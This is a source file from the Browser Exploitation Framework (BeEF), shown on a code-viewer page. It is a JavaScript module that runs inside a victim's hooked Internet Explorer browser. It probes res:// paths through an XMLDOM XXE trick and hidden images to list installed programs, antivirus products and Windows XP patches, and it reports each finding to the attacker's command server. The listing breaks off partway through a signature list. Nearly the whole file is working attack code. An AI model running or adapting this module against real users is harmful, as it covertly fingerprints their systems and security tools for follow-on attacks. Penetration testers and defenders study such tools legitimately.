Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/host/detect_software/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8


9
  if (!("ActiveXObject" in window)) {

10
    beef.debug('[Detect Software] Unspported browser');

11
    beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.are.status_error());

12
    return false;

13
  }

14


15
  var drive = 'C';

16
  var win_dir = 'WINDOWS';

17
  var program_dirs = ['Program Files', 'Program Files (x86)'];

18
  var xmldom_supported = false;

19


20
  function detect_folder(path) {

21
    var dtd = 'res://' + path;

22
    var xml = '<?xml version="1.0" ?><!DOCTYPE anything SYSTEM "' + dtd + '">';

23
    var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");

24
    xmlDoc.async = true;

25
    try {

26
      xmlDoc.loadXML(xml);

27
      return false;

28
    } catch (e) {

29
      return true;

30
    }

31
  }

32


33
  // Test XMLDOM XXE technique

34
  for (var i = 0; i < program_dirs.length; i++) {

35
    var path = drive + ":\\" + program_dirs[i];

36
    var result = detect_folder(path);

37
    if (result) {

38
      xmldom_supported = true;

39
      break;

40
    }

41
  }

42


43
  // Detect software using XMLDOM XXE technique

44
  var software = [

45
    ['7zip', '7-Zip'],

46
    ['Acoustica MP3 Audio Mixer', 'Acoustica MP3 Audio Mixer'],

47
    ['Autodesk AutoCAD 2015', 'Autodesk\\AutoCAD 2015'],

48
    ['Autodesk AutoCAD 2016', 'Autodesk\\AutoCAD 2016'],

49
    ['Adobe Help', 'Adobe\\Adobe Help Viewer'],

50
    ['Adobe Professional 7', 'Adobe\\Acrobat 7.0'],

51
    ['Adobe Reader 7', 'Adobe\\Reader 7.0\\Reader'],

52
    ['Adobe Reader 8', 'Adobe\\Reader 8.0\\Reader'],

53
    ['Adobe Reader 9', 'Adobe\\Reader 9.0\\Reader'],

54
    ['Adobe Reader 10', 'Adobe\\Reader 10.0\\Reader'],

55
    ['Adobe Reader 11', 'Adobe\\Reader 11.0\\Reader'],

56
    ['Ahead Nero', 'ahead'],

57
    ['AirPcap', 'Riverbed\\AirPcap'],

58
    ['Apple Software Update', 'Apple Software Update'],

59
    ['Azureus', 'azureus'],

60
    ['Baidu', 'baidu'],

61
    ['BitComet', 'BitComet'],

62
    ['BitSpirit', 'BitSpirit'],

63
    ['BioExplorer', 'BioExplorer'],

64
    ['Cisco Prime Data Center Network Manager', 'Cisco Systems\\dcm'],

65
    ['Citrix', 'Citrix'],

66
    ['DbVisualizer', 'DbVisualizer'],

67
    ['eMule', 'eMule'],

68
    ['eMule', 'easyMule2'],

69
    ['Flash MX 2004', 'Macromedia\\Flash MX 2004'],

70
    ['Flashget', 'FlashGet'],

71
    ['Flashget 3', 'FlashGet Network\\FlashGet 3'],

72
    ['FoxIt Reader', 'Foxit Software'],

73
    ['FoxIt Reader', 'Foxit Reader'],

74
    ['Free Nokia Ringtone Converter', 'Free Nokia Ringtone Converter'],

75
    ['Git', 'Git'],

76
    ['Gnome Music Player Client', 'Gnome Music Player Client'],

77
    ['GnuPG', 'GNU\\GnuPG'],

78
    ['Heroku', 'Heroku'],

79
    ['HP AutoPass License Server', 'HP\\HP AutoPass License Server'],

80
    ['HP TRIM', 'Hewlett-Packard\\HP TRIM'],

81
    ['IceWeasel', 'IceWeasel'],

82
    ['IncredibleCharts', 'IncredibleCharts'],

83
    ['Internet Explorer', 'Internet Explorer'],

84
    ['iTunes', 'iTunes'],

85
    ['Java JRE 6', 'Java\\jre6'],

86
    ['Java JRE 7', 'Java\\jre7'],

87
    ['Java JRE 8', 'Java\\jre8'],

88
    ['JetBrains dotPeek', 'JetBrains\\dotPeek'],

89
    ['Juniper Network Connect 8.1', 'Juniper Networks\\Network Connect 8.1'],

90
    ['JXplorer', 'jxplorer'],

91
    ['Lexmark Markvision Enterprise', 'Lexmark\\Markvision Enterprise'],

92
    ['Magellan MapSend Lite', 'Magellan\MapSend Lite'],

93
    ['Microsoft Baseline Security Analyzer 2', 'Microsoft Baseline Security Analyzer 2'],

94
    ['Microsoft Live Meeting 7', 'Microsoft Office\\live meeting 7'],

95
    ['Microsoft SQL Server', 'Microsoft SQL Server'],

96
    ['Microsoft SQL Server Compact Edition', 'Microsoft SQL Server Compact Edition'],

97
    ['Microsoft Virtual PC', 'Microsoft Virtual PC'],

98
    ['Microsoft Visual Studio 8', 'Microsoft Visual Studio 8'],

99
    ['Microsoft Visual Studio 9', 'Microsoft Visual Studio 9'],

100
    ['Microsoft Visual Studio 10', 'Microsoft Visual Studio 10'],

101
    ['Microsoft Visual Studio 11', 'Microsoft Visual Studio 11'],

102
    ['Microsoft Visual Studio 12', 'Microsoft Visual Studio 12'],

103
    ['mIRC', 'mIRC'],

104
    ['Mozilla Firefox', 'Mozilla Firefox'],

105
    ['MSN Messenger', 'Messenger'],

106
    ['NipperStudio', 'NipperStudio'],

107
    ['KeePass Password Safe 2', 'KeePass Password Safe 2'],

108
    ['NetBeans 8.1', 'NetBeans 8.1'],

109
    ['NeuroServer', 'NeuroServer'],

110
    ['Nokia PC Suite', 'Nokia\\Connectivity Cable Driver'],

111
    ['Notepad Plus Plus', 'Notepad++'],

112
    ['Opera', 'Opera'],

113
    ['Oracle JavaFX 2.0 Runtime', 'Oracle\\JavaFX 2.0 Runtime'],

114
    ['Outlook Express', 'Outlook Express'],

115
    ['Paritech Pulse', 'Paritech\\Pulse'],

116
    ['PGP Desktop', 'PGP Corporation\\PGP Desktop'],

117
    ['Picasa2', 'picasa2'],

118
    ['Proxifier', 'Proxifier'],

119
    ['QuickTime', 'QuickTime'],

120
    ['QLogic SANsurfer', 'QLogic Corporation\SANsurfer'],

121
    ['radmin', 'Radmin'],

122
    ['Real VNC4', 'RealVNC\\VNC4'],

123
    ['RedGate .NET Reflector', 'Red Gate\\.NET Reflector'],

124
    ['Resource Hacker', 'Resource Hacker'],

125
    ['Safari', 'Safari'],

126
    ['SeaMonkey', 'SeaMonkey'],

127
    ['SiteKiosk', 'SiteKiosk'],

128
    ['Spark', 'Spark'],

129
    ['TeamSpeak 3 Client', 'TeamSpeak 3 Client'],

130
    ['TinaSoft Easy Cafe Server', 'TinaSoft\\Easy Cafe Server'],

131
    ['Trend Micro Deep Security Manager', 'Trend Micro\\Deep Security Manager'],

132
    ['TrueCrypt', 'TrueCrypt'],

133
    ['TopShare Portfolio Manager v2', 'TopShare Portfolio Manager V2'],

134
    ['Samsung USB Drivers for Mobile Phones', 'SAMSUNG\\USB Drivers'],

135
    ['Secure CRT', 'SecureCRT'],

136
    ['Serv—U', 'RhinoSoft.com\\Serv—U'],

137
    ['Skype', 'Skype\\Phone'],

138
    ['SoapUI 5.0.0', 'SmartBear\\SoapUI-5.0.0'],

139
    ['Thunder', 'Thunder Network\\Thunder'],

140
    ['Thunder', 'Thunder Network\\Thunder6'],

141
    ['Tencent QQDownload', 'Tencent\\QQDownload'],

142
    ['VLC', 'VideoLAN\\VLC'],

143
    ['Ultramon', 'ultramon\\ultramondesktop.exe'],

144
    ['Unreal Media Server', 'UnrealStreaming\\UMediaServer'],

145
    ['uTorrent', 'uTorrent'],

146
    ['VMware Workstation', 'vmware\\vmware workstation'],

147
    ['VMware Tools', 'VMware\\VMware Tools'],

148
    ['VMware Workstation', 'VMware\\VMware Workstation'],

149
    ['VirtualBox Guest Additions', 'Oracle\\VirtualBox Guest Additions'],

150
    ['Winamp', 'winamp'],

151
    ['Windows DVD Maker', 'DVD Maker'],

152
    ['Windows Journal', 'Windows Journal'],

153
    ['Windows Media Player', 'Windows Media Player'],

154
    ['Windows Mail', 'Windows Mail'],

155
    ['Windows Movie Maker', 'Movie Maker'],

156
    ['Windows NetMeeting', 'NetMeeting'],

157
    ['Windows Photo Viewer', 'Windows Photo Viewer'],

158
    ['WinHex', 'WinHex'],

159
    ['WinRAR', 'WinRAR'],

160
    ['WinZip', 'WinZip'],

161
    ['Wireshark', 'Wireshark'],

162
    ['WinPcap', 'WinPcap'],

163
    ['WinSCP', 'WinSCP'],

164
    ['XFire', 'xfire'],

165
    ['Xming', 'Xming X Server'],

166
    ['Yahoo Messenger', 'Yahoo!\\Messenger'],

167


168
    // AntiVirus

169
    ['360Safe', '360\\360Safe'],

170
    ['360Safe', '360Safe'],

171
    ['A-Squared Anti-Malware', 'A-Squared Anti-Malware'],

172
    ['Agnitum Outpost Security Suite Pro', 'Agnitum\\Outpost Security Suite Pro'],

173
    ['AhnLab', 'AhnLab'],

174
    ['ESET Smart Security', 'ESET\\ESET Smart Security'],

175
    ['ESTsoft ALYac Internet Security', 'ESTsoft\\ALYac'],

176
    ['AhnLab', 'AhnLab\\Smart Update Utility'],

177
    ['AhnLab V3 Internet Security Lite', 'AhnLab\\V3Lite'],

178
    ['Avast AntiVirus 4', 'Alwil Software\\Avast4'],

179
    ['Avast AntiVirus', 'AVAST Software\\Avast'],

180
    ['AVG 2012', 'AVG\\AVG2012'],

181
    ['AVG', 'AVG Secure Search'],

182
    ['Avira AntiVir Desktop', 'Avira\\AntiVir Desktop'],

183
    ['Avira AntiVir Personal Edition', 'Avira\\AntiVir PersonalEdition Classic'],

184
    ['BitDefender', 'BitDefender'],

185
    ['DrWeb AntiVirus', 'DrWeb'],

186
    ['eScan AntiVirus', 'eScan'],

187
    ['F-Secure ExploitShield', 'F-Secure\\ExploitShield'],

188
    ['F-Secure Internet Security', 'F-Secure Internet Security\\FSPS'],

189
    ['F-PROT Antivirus', 'FRISK Software\\F-PROT Antivirus for Windows'],

190
    ['Kaspersky Internet Security 2012', 'Kaspersky Lab\\Kaspersky Internet Security 2012'],

191
    ['Kaspersky Anti-Virus 2009', 'Kaspersky Lab\\Kaspersky Anti-Virus 2009'],

192
    ['Kaspersky Anti-Virus 2010', 'Kaspersky Lab\\Kaspersky Anti-Virus 2010'],

193
    ['Kaspersky Anti-Virus 2011', 'Kaspersky Lab\\Kaspersky Anti-Virus 2011'],

194
    ['Kaspersky Anti-Virus 2012', 'Kaspersky Lab\\Kaspersky Anti-Virus 2012'],

195
    ['Kaspersky Anti-Virus 2013', 'Kaspersky Lab\\Kaspersky Anti-Virus 2013'],

196
    ['Kaspersky Anti-Virus 2014', 'Kaspersky Lab\\Kaspersky Anti-Virus 2014'],

197
    ['Kaspersky Endpoint Security 8', 'Kaspersky Lab\\Kaspersky Endpoint Security 8 for Windows'],

198
    ['Kaspersky Internet Security 2010', 'Kaspersky Lab\\Kaspersky Internet Security 2010'],

199
    ['Kaspersky Internet Security 2009', 'Kaspersky Lab\\Kaspersky Internet Security 2009'],

200
    ['Kingsoft AntiVirus', 'KingSoft\\kingsoft antivirus'],

201
    ['IKARUS anti.virus', 'IKARUS\\anti.virus'],

202
    ['Immunet AntiVirus', 'Immunet'],

203
    ['JiangMin AntiVirus', 'JiangMin\\AntiVirus'],

204
    ['Micropoint AntiVirus', 'Micropoint'],

205
    ['Microsoft EMET 4.1', 'EMET 4.1'],

206
    ['Microsoft EMET 5.0', 'EMET 5.0'],

207
    ['McAfee Total Protection 2011', 'McAfeeMOBK'],

208
    ['McAfee Enterprise', 'McAfee\\VirusScan Enterprise'],

209
    ['McAfee Security Center', 'McAfee\\MSC'],

210
    ['Norman Scan Engine', 'Norman\\Nse'],

211
    ['Norton Internet Security', 'Norton Internet Security'],

212
    ['Norton AntiVirus', 'Norton AntiVirus'],

213
    ['nProtect Anti-Virus Spyware 3.0', 'INCAInternet\\nProtect Anti-Virus Spyware 3.0'],

214
    ['PC Tools Antivirus Software', 'PC Tools Antivirus Software'],

215
    ['Quick Heal Total Security', 'Quick Heal\\Quick Heal Total Security'],

216
    ['Sucop Antivirus', 'Sucop\\SecPlugin'],

217
    ['Rising AntiVirus', 'Rising\\RAV'],

218
    ['Rising AntiVirus', 'Rising\\RIS'],

219
    ['Rising Firewall', 'Rising\\RFW'],

220
    ['Sunbelt Software Personal Firewall', 'Sunbelt Software\\Personal Firewall'],

221
    ['Sophos Sophos Anti-Virus', 'Sophos\\Sophos Anti-Virus'],

222
    ['Sophos Client Firewall', 'Sophos\\Sophos Client Firewall'],

223
    ['SUPERAntiSpyware', 'SUPERAntiSpyware'],

224
    ['Symantec Endpoint Protection', 'Symantec\\Symantec Endpoint Protection'],

225
    ['Symantec Antivirus', 'symantec_client_security\\symantec antivirus'],

226
    ['Trend Micro Internet Security', 'Trend Micro\\Internet Security'],

227
    ['Trend Micro OfficeScan Client', 'Trend Micro\\OfficeScan Client'],

228
    ['VirusBuster', 'VirusBuster'],

229
    ['Windows Defender', 'Windows Defender'],

230
    ['ZoneAlarm', 'Zone Labs\\ZoneAlarm'],

231


232
    // Office

233
    ['Microsoft Office', 'Microsoft Office\\OFFICE'],

234
    ['Microsoft Office 10', 'Microsoft Office\\OFFICE10'],

235
    ['Microsoft Office 11', 'Microsoft Office\\OFFICE11'],

236
    ['Microsoft Office 12', 'Microsoft Office\\OFFICE12'],

237
    ['Microsoft Office 13', 'Microsoft Office\\OFFICE13'],

238
    ['Microsoft Office 14', 'Microsoft Office\\OFFICE14'],

239
    ['WPS Office', 'Kingsoft\\Kingsoft Office'],

240
    ['WPS Office Personal', 'Kingsoft\\WPS Office Personal'],

241
    ['WPS Office 2008', 'Kingsoft\\WPS Office 2008'],

242
    ['WPS Office 2009', 'Kingsoft\\WPS Office 2009'],

243
    ['WPS Office 2010', 'Kingsoft\\WPS Office 2010'],

244


245
    // Security

246
    ['Cain', 'Cain'],

247
    ['Echo Mirage', 'Echo Mirage'],

248
    ['Fiddler2', 'Fiddler2'],

249
    ['L0pht Crack 5', '@stake\\LC5'],

250
    ['Immunity Debugger', 'Immunity Inc\\Immunity Debugger'],

251
    ['Network Miner v2.1', 'NetworkMiner_2-1'],

252
    ['Nmap', 'nmap'],

253


254
    // VPN

255
    ['Checkpoint Endpoint Connect', 'Checkpoint\\Endpoint Connect'],

256
    ['Cisco AnyConnect Secure Mobility Client', 'Cisco AnyConnect Secure Mobility Client'],

257
    ['Cisco AnyConnect VPN Client', 'Cisco AnyConnect VPN Client'],

258
    ['Fortinet FortiClient', 'Fortinet\\FortiClient'],

259
    ['OpenVPN', 'OpenVPN']

260
  ];

261


262
  if (xmldom_supported) {

263
    beef.debug('[Detect Software] Enumerating software...');

264
    for (var i = 0; i < program_dirs.length; i++) {

265
      for (var j = 0; j < software.length; j++) {

266
        var path = drive + ":\\" + program_dirs[i] + "\\" + software[j][1];

267
        var result = detect_folder(path);

268
        if (result) {

269
          beef.debug('[Detect Software] Found software: ' + path);

270
          beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + software[j][0]);

271
        }

272
      }

273
    }

274
  }

275


276
  // Enumerate patches (Win XP only)

277
  var patches = [

278
    'KB2570947',

279
    'KB2584146',

280
    'KB2585542',

281
    'KB2592799',

282
    'KB2598479',

283
    'KB2603381',

284
    'KB2619339',

285
    'KB2620712',

286
    'KB2631813',

287
    'KB2653956',

288
    'KB2655992',

289
    'KB2659262',

290
    'KB2661637',

291
    'KB2676562',

292
    'KB2686509',

293
    'KB2691442',

294
    'KB2698365',

295
    'KB2705219-v2',

296
    'KB2712808',

297
    'KB2719985',

298
    'KB2723135-v2',

299
    'KB2727528',

300
    'KB2749655',

301
    'KB2757638',

302
    'KB2770660',

303
    'KB2780091',

304
    'KB2802968',

305
    'KB2803821-v2_WM9',

306
    'KB2807986',

307
    'KB2813345',

308
    'KB2820917',

309
    'KB2834886',

310
    'KB2847311',

311
    'KB2850869',

312
    'KB2859537',

313
    'KB2862152',

314
    'KB2862330',

315
    'KB2862335',

316
    'KB2864063',

317
    'KB2868038',

318
    'KB2868626',

319
    'KB2876217',

320
    'KB2876331',

321
    'KB2892075',

322
    'KB2893294',

323
    'KB2898715',

324
    'KB2900986',

325
    'KB2904266',

326
    'KB2909212',

327
    'KB2914368',

328
    'KB2916036',

329
    'KB2922229',

330
    'KB2929961',

331
    'KB2930275',

332
    'KB2934207',

333
    'KB2936068',

334
    'KB2964358',

335
    'KB898461',

336
    'KB923561',

337
    'KB946648',

338
    'KB950762',

339
    'KB950974',

340
    'KB951376-v2',

341
    'KB951978',

342
    'KB952004',

343
    'KB952069_WM9',

344
    'KB952287',

345
    'KB952954',

346
    'KB953155',

347
    'KB954155_WM9',

348
    'KB955759',

349
    'KB956572',

350
    'KB956844',

351
    'KB959426',

352
    'KB960803',

353
    'KB960859',

354
    'KB961118',

355
    'KB968389',

356
    'KB969059',

357
    'KB970430',

358
    'KB970483',

359
    'KB971029',

360
    'KB971657',

361
    'KB972270',

362
    'KB973507',

363
    'KB973540_WM9',

364
    'KB973815',

365
    'KB973869',

366
    'KB973904',

367
    'KB974112',

368
    'KB974318',

369
    'KB974392',

370
    'KB974571',

371
    'KB975025',

372
    'KB975467',

373
    'KB975558_WM8',

374
    'KB975560',

375
    'KB975713',

376
    'KB976323',

377
    'KB977816',

378
    'KB977914',

379
    'KB978338',

380
    'KB978542',

381
    'KB978695_WM9',

382
    'KB978706',

383
    'KB979309',

384
    'KB979482',

385
    'KB979687',

386
    'KB981997',

387
    'KB982132',

388
    'KB982665'

389
  ];

390


391
  if (xmldom_supported) {

392
    beef.debug("[Detect Software] Enumerating installed patches...");

393
    for (var i = 0; i < patches.length; i++) {

394
      var path = drive + ":\\" + win_dir + "\\$NtUninstall" + patches[i] + "$";

395
      var result = detect_folder(path);

396
      if (result) {

397
        beef.debug('[Detect Software] Found patch: ' + path);

398
        beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_patches=" + patches[i]);

399
      }

400
    }

401
  }

402


403
  // Skip software detection using 'res' scheme and EXE/DLL resource images

404
  // if XMLDOM XXE technique worked

405
  if (xmldom_supported) return;

406


407


408


409
  // Detect software using 'res' scheme and EXE/DLL resource images

410
  var dom = beef.dom.createInvisibleIframe();

411


412
  // Enumerate patches (Win XP only)

413
  var patches = [

414
    ["KB2964358", "mshtml.dll/2/2030"],      // MS14-021

415
    ["KB2936068", "mshtmled.dll/2/2503"],    // MS14-018

416
    ["KB2864063", "themeui.dll/2/120"],      // MS13-071

417
    ["KB2859537", "ntkrpamp.exe/2/1"],       // MS13-063

418
    ["KB2813345", "mstscax.dll/2/101"],      // MS13-029

419
    ["KB2820917", "winsrv.dll/#2/#512"],     // MS13-033

420
    ["KB2691442", "shell32.dll/2/130"],      // MS12-048

421
    ["KB2676562", "ntkrpamp.exe/2/1"],       // MS12-034

422
    ["KB2506212", "mfc42.dll/#2/#26567"],    // MS11-024

423
    ["KB2483185", "shell32.dll/2/130"],      // MS11-006

424
    ["KB2481109", "mstsc.exe/#2/#620"],      // MS11-017

425
    ["KB2443105", "isign32.dll/2/#101"],     // MS10-097

426
    ["KB2393802", "ntkrnlpa.exe/2/#1"],      // MS11-011

427
    ["KB2387149", "mfc40.dll/#2/#26567"],    // MS10-074

428
    ["KB2296011", "comctl32.dll/#2/#120"],   // MS10-081

429
    ["KB979687", "wordpad.exe/#2/#131"],     // MS10-083

430
    ["KB978706", "mspaint.exe/#2/#102"],     // MS10-005

431
    ["KB977914", "iyuv_32.dll/2/INDEOLOGO"], // MS10-013

432
    ["KB973869", "dhtmled.ocx/#2/#1"]        // MS09-037

433
  ];

434


435
  beef.debug("[Detect Software] Enumerating installed patches...");

436
  for (var i=0; i<patches.length; i++) {

437
    var img    = new Image;

438
    img.title  = patches[i][0];

439
    img.src    = "res://" + drive + ":\\" + win_dir + "\\$NtUninstall" + patches[i][0] + "$\\" + patches[i][1];

440
    img.onload = function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_patches=" + this.title); dom.removeChild(this); }

441
    img.onerror= function() { dom.removeChild(this); }

442
    dom.appendChild(img);

443
  }

444


445
  // Enumerate software

446
  var software = [

447
    ["7zip", "7-Zip\\7zFM.exe/2/2002"],

448
    ["Adobe Help", "Adobe\\Adobe Help Viewer\\1.0\\ahv.exe/#2/#132"],

449
    ["Baidu", "baidu\\Baidu Hi\\BaiduHi.exe/#2/#152"],

450
    ["Cain", "Cain\\UNWISE.EXE/2/106"],

451
    ["Echo Mirage", "Echo Mirage\\unins000.exe/2/DISKIMAGE"],

452
    ["FoxIt Reader", "Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/257"],

453
    ["FoxIt Reader", "Foxit Reader\\Foxit Reader.exe/#2/#484"],

454
    ["Internet Explorer", "Internet Explorer\\iedvtool.dll/2/4000"],

455
    ["Outlook Express", "Outlook Express\\msoeres.dll/2/1"],

456
    ["KeePass Password Safe 2", "KeePass Password Safe 2\\unins000.exe/2/DISKIMAGE"],

457
    ["Nokia PC Suite", "Nokia\\Connectivity Cable Driver\\nmwcdcocls.dll/2/131"],

458
    ["Notepad Plus Plus", "Notepad++\\uninstall.exe/2/110"],

459
    ["OpenVPN", "OpenVPN\\Uninstall.exe/2/110"],

460
    ["Oracle JavaFX 2.0 Runtime", "Oracle\\JavaFX 2.0 Runtime\\bin\\eula.dll/2/204"],

461
    ["Resource Hacker", "Resource Hacker\\ResHacker.exe/2/128"],

462
    ["Samsung USB Drivers for Mobile Phones", "SAMSUNG\\USB Drivers\\Uninstall.exe/2/132"],

463
    ["Tencent QQDownload", "Tencent\\QQDownload\\QQDownload.exe/2/132"],

464
    ["QuickTime", "QuickTime\\QTinfo.exe/2/101"],

465
    ["QuickTime", "QuickTime\\quicktimeplayer.exe/#2/#403"],

466
    ["VLC", "VideoLAN\\VLC\\npvlc.dll/2/3"],

467
    ["Immunity Debugger", "Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe/2/GOTO"],

468
    ["Java JRE 6", "Java\\jre6\\bin\\awt.dll/2/CHECK_BITMAP"],

469
    ["Java JRE 7", "Java\\jre7\\bin\\awt.dll/2/CHECK_BITMAP"],

470
    ["Java JRE 8", "Java\\jre8\\bin\\awt.dll/2/CHECK_BITMAP"],

471
    ["VMware Tools", "VMware\\VMware Tools\\TPVCGatewaydeu.dll/2/30994"],

472
    ["VMware Tools", "VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/30995"],

473
    ["VMware Workstation", "VMware\\VMware Workstation\\vmplayer.exe/#2/5"],

474
    ["VMware Workstation", "VMware\\VMware Workstation\\vmware.exe/#2/#508"],

475
    ["VirtualBox Guest Additions", "Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/110"],

476
    ["Windows DVD Maker", "DVD Maker\\DVDMaker.exe/2/438"],

477
    ["Windows Journal", "Windows Journal\\Journal.exe/2/112"],

478
    ["Windows Mail", "Windows Mail\\msoeres.dll/2/1"],

479
    ["Windows Movie Maker", "Movie Maker\\wmm2res.dll/2/201"],

480
    ["Windows NetMeeting", "NetMeeting\\nmchat.dll/2/207"],

481
    ["Windows Photo Viewer", "Windows Photo Viewer\\PhotoViewer.dll/2/#51209"],

482
    ["WinRAR", "WinRAR\\WinRAR.exe/#2/#150"],

483
    ["Microsoft Virtual PC", "Microsoft Virtual PC\\Virtual PC.exe/#2/150"],

484
    ["Wireshark", "Wireshark\\uninstall.exe/2/110"],

485


486
    // AntiVirus software

487
    ["360Safe", '360\\360Safe\\360leakfixer.exe/#2/110'],

488
    ["360Safe", '360\\360Safe\\repairleakdll.dll/GIF/154'],

489
    ["360Safe", '360Safe\\live.dll/#2/#203'],

490
    ["360Safe", '360\\360safe\\360Safe.exe/2/131'],

491
    ["ESTsoft ALYac Internet Security", 'ESTsoft\\ALYac\\AYUpdate.aye/2/30994'],

492
    ["AhnLab", 'AhnLab\\Smart Update Utility\\SUpdate.exe/2/153'],

493
    ["AhnLab V3 Internet Security Lite", 'AhnLab\\V3Lite\\V3LTray.exe/2/132'],

494
    ["Avast AntiVirus 4", 'Alwil Software\\Avast4\\ashAvast.exe/2/267'],

495
    ["Avast AntiVirus", 'AVAST Software\\Avast\\aswAra.dll/#2/101'],

496
    ["AVG 2012", 'AVG\\AVG2012\\avguires.dll/#2/111'],

497
    ["Avira AntiVir Desktop", 'Avira\\AntiVir Desktop\\ccquarc.dll/#2/101'],

498
    ["Avira AntiVir Desktop", 'Avira\\AntiVir Desktop\\setup.dll/#2/132'],

499
    ["Avira AntiVir Personal Edition", 'Avira\\AntiVir PersonalEdition Classic\\setup.dll/#2/#132'],

500
    ["DrWeb AntiVirus", 'DrWeb\\spideragent.exe/#2/133'],

501
    ["Kaspersky Internet Security 2012", 'Kaspersky Lab\\Kaspersky Internet Security 2012\\basegui.ppl/#2'],

502
    ["Kaspersky Anti-Virus 2009", 'Kaspersky Lab\\Kaspersky Anti-Virus 2009\\oeas.dll/2/206'],

503
    ["Kaspersky Anti-Virus 2010", 'Kaspersky Lab\\Kaspersky Anti-Virus 2010\\shellex.dll/2/103'],

504
    ["Kaspersky Internet Security 2010", 'Kaspersky Lab\\Kaspersky Internet Security 2010\\shellex.dll/2/103'],

505
    ["Kaspersky Internet Security 2009", 'Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206'],

506
    ["Kingsoft AntiVirus", 'KingSoft\\kingsoft antivirus\\kislive.exe/#2/102'],

507
    ["Rising AntiVirus", 'Rising\\RAV\\RavUsb.exe/#2/112'],

508
    ["Rising AntiVirus", 'Rising\\Ris\\SetUp.exe/2/147'],

509
    ["ESET Smart Security", 'ESET\\ESET Smart Security\\eguiEpfw.dll/#2/1070'],

510
    ["JiangMin AntiVirus", 'JiangMin\\AntiVirus\\VirusBox.exe/#2/128'],

511
    ["JiangMin AntiVirus", 'JiangMin\\Install\\KVOL.exe/2/202'],

512
    ["Micropoint AntiVirus", 'Micropoint\\mfc90.dll/#2/30994'],

513
    ["McAfee Total Protection 2011", 'McAfeeMOBK\\BootStrap.exe/#2/30994'],

514
    ["McAfee Enterprise", 'McAfee\\VirusScan Enterprise\\graphics.dll/2/202'],

515
    ["McAfee Security Center", 'McAfee\\MSC\\mclgview.exe/2/129'],

516
    ["Norton Internet Security 16.0.0.125", 'Norton Internet Security\\Engine\\16.0.0.125\\SymSHAx9.dll/2/102'],

517
    ["Norton Internet Security 16.5.0.135", 'Norton Internet Security\\Engine\\16.5.0.135\\SymSHAx9.dll/2/102'],

518
    ["Norton AntiVirus 17.5.0.127", 'Norton AntiVirus\\MUI\\17.5.0.127\\images\\cssbase.dll/2/SCANTASKWZ_SCAN_ITEM_LIST.BMP'],

519
    ["NOD32 Smart Security", 'ESET\\ESET Smart Security\\eguiEpfw.dll/2/1070'],

520
    ["Trend Micro Internet Security", 'Trend Micro\\Internet Security\\UfSeAgnt.exe/2/30994'],

521
    ["Trend Micro OfficeScan Client", 'Trend Micro\\OfficeScan Client\\PcNTMon.exe/2/30994'],

522
    ["Sucop Antivirus", 'Sucop\\SecPlugin\\SecPlugin.dll/#2/211'],

523
    ["Sophos Client Firewall", 'Sophos\\Sophos Client Firewall\\logo_rc.dll/2/114'],

524
    ["Symantec Endpoint Protection", 'Symantec\\LiveUpdate\\AUPDATE.exe/2/129'],

525
    ["ZoneAlarm", 'Zone Labs\\ZoneAlarm\\alert.zap/2/176'],

526


527
    // The following signatures were taken from:

528
    // https://www.alienvault.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi

529
    ["Microsoft Office 97", "Microsoft Office\\OFFICE\\BINDER.EXE/16/1"],

530
    ["Microsoft Office 2000", "Microsoft Office\\OFFICE\\WINWORD.EXE/16/1"],

531
    ["Microsoft Office XP", "Microsoft Office\\OFFICE10\\WINWORD.EXE/16/1"],

532
    ["Microsoft Office 2003", "Microsoft Office\\OFFICE11\\WINWORD.EXE/16/1"],

533
    ["Microsoft Office 2007", "Microsoft Office\\OFFICE12\\WINWORD.EXE/16/1"],

534
    ["Microsoft Office 2010", "Microsoft Office\\OFFICE14\\WINWORD.EXE/16/1"],

535
    ["WPS Office Personal", "Kingsoft\\WPS Office Personal\\utility\\repairinst.exe/16/1"],

536
    ["WPS Office 2008", "Kingsoft\\WPS Office 2008\\utility\\repairinst.exe/16/1"],

537
    ["WPS Office 2009", "Kingsoft\\WPS Office 2009\\utility\\repairinst.exe/16/1"],

538
    ["WPS Office 2010", "Kingsoft\\WPS Office 2010\\utility\\repairinst.exe/16/1"],

539
    ["WinRar 3.5", "WinRAR\\WinRar.exe/6/90"],

540
    ["WinRar 3.6", "WinRAR\\WinRar.exe/6/91"],

541
    ["WinRar 3.7", "WinRAR\\WinRar.exe/6/92"],

542
    ["WinRar 3.8", "WinRAR\\WinRar.exe/6/93"],

543
    ["WinRar 3.9", "WinRAR\\RarExt.d11/24/2"],

544
    ["WinZip", "WinZip\\WinZip32.exe/16/1"],

545
    ["7zip", "7—Zip\\7zFm.exe/16/1"],

546
    ["Adobe Reader 7", "Adobe\\Reader 7.0\\Reader\\AXEParser.d11/16/1"],

547
    ["Adobe Professional 7", "Adobe\\Acrobat 7.0\\Acrobat\\Acrobat.dll/16/1"],

548
    ["Adobe Reader 8", "Adobe\\Reader 8.0\\Reader\\AdobeXMP.d11/16/1"],

549
    ["Adobe Reader 9", "Adobe\\Reader 9.0\\Reader\\AcroRd32.exe/16/1"],

550
    ["Adobe Reader 10", "Adobe\\Reader 10.0\\Reader\\AcroRd32.exe/16/1"],

551
    ["Skype", "Skype\\Phone\\Skype.exe/16/1"],

552
    ["Skype", "Skype\\Phone\\sktransfer.d11/16/1"],

553
    ["Microsoft Outlook 6", "Outlook Express\\msimn.exe/16/1"],

554
    ["Microsoft Outlook 2000", "Microsoft Office\\OFFICE\\OUTLOOK.EXE/16/1"],

555
    ["Microsoft Outlook XP", "Microsoft Office\\OFFICE10\\OUTLOOK.EXE/16/1"],

556
